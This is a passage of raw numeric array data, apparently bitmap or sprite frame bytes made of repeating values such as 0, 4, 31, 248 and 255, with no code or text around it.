0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 16, 0, 0, 128, 16, 0, 0, 128,
16, 128, 16, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 16, 0, 0, 128, 16, 0, 0,
128, 16, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 16, 0, 0, 128, 16,
0, 0, 128, 16, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 16, 128, 16,
128, 16, 128, 16, 128, 16, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
128, 16, 128, 16, 128, 16, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 128, 16, 0, 0, 128, 16, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
